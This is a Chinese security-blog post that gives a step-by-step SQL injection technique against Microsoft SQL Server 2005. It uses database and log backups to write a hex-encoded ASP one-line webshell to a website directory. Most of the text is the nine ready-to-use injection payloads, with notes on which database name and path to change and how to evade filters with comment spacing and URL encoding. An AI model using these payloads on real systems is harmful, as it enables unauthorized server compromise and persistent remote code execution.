首页
网页制作
网络编程
脚本专栏
数据库
网站运营
网络安全
平面设计
CMS教程
搜索
建站极客
网络安全
脚本攻防
正文
mssql2005 DB权限导出一句话
所属分类:
网络安全
/
脚本攻防
阅读数: 207
收藏 0
赞 0
分享
网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。
后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体的利用语句,但贴出来的文章貌似没啥水准,大家都知道手工差异备份是自己需要修改数据库名和网站路径的,但那个文章中对语句没有做任何解释,无奈之下我只好自己尝试了,虽然测试的网站没有成功拿下shell,单语句是没有错误的,我在本地的MSSQL2005的查询分析器中测试通过了,再次特将语句整理出来分享个大家,并做好详细的解释说明,首先来贴出语句。
第一步
;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--
第二步:
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
第三步
;drop/**/table/**/[itpro]--
第四步
;create/**/table/**/[itpro]([a]/**/image)--
第五步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
第六步
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
第七步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
第八步
;drop/**/table/**/[itpro]--
第九步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。
更多精彩内容
其他人还在看
ECSHOP php商城系统过滤不严导致SQL注入漏洞
ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能
评论 0
收藏 0
赞 0
分享
DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)
DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本
评论 0
收藏 0
赞 0
分享
网站被SQL注入防范(WebKnight)
分享一下内容篡改式攻击的判断方法、SQL注入攻击的防范、以及被攻击后的补救(数据恢复)相关知识
评论 0
收藏 0
赞 0
分享
手工注入方法,方便大家测试程序漏洞
手工注入方法,方便大家测试程序漏洞,本人只供学习交流,不建议搞破坏。
评论 0
收藏 0
赞 0
分享
XSS漏洞报告
对于的用户输入搜索出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识,以后在开发的时候,每当有用户输入的内容时,都要加倍小心
评论 0
收藏 0
赞 0
分享
PHP Webshell 下的端口反弹方法
phpspy2011 中的 Back Connect 怎么弄都不能反弹回来,在网上找了段代码,测试成功了,但自己看了下,这段代码貌似也是从 phpspy 中分离出来的
评论 0
收藏 0
赞 0
分享
万博企业网站管理系统注入漏洞(MemberLogin.asp)
这个注入漏洞发生在html/MemberLogin.asp文件里,在Include下有NoSqlHack.Asp文件也没调用,呵呵,就有了我们利用的地方了
评论 0
收藏 0
赞 0
分享
PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术
评论 0
收藏 0
赞 0
分享
mysql注入导库脚本代码
mysql注入导库脚本代码,学习安全的朋友要注意防范。
评论 0
收藏 0
赞 0
分享
BOSSI 公司企业网站管理系统注入&上传漏洞利用
BOSSI 公司(企业)网站管理系统,中英文双语版,后台在同一页内同时管理添加修改资料内的中英文内容,网站的左边栏使用了模块,可以自由的增加&删除,可以不用修改代码
评论 0
收藏 0
赞 0
分享
查看更多
网络赚钱
更多
网站赚钱就靠广告到底行不行?
网络赚钱靠骗吗?
什么样的网站赚钱 怎么赚钱?
短视频如何赚钱?短视频自媒体实操经验分享(真实)
谷歌广告怎么收款?光大银行需要携带资料到柜台办理
SEO都有哪些赚钱的方式? SEO的十种赚钱方式详解
站长故事
更多
iPhone创造了黄牛 还是黄牛捧红了iPhone?
某个人站长怎么用交友网站年赚80万的
站长故事之一份月薪1200元的SEO推广工作
作为站长的你是否已有危机感:你被盯上了
浅析将两个月的新站做到权重4的方案
做好网站维护 持续吸引用户浏览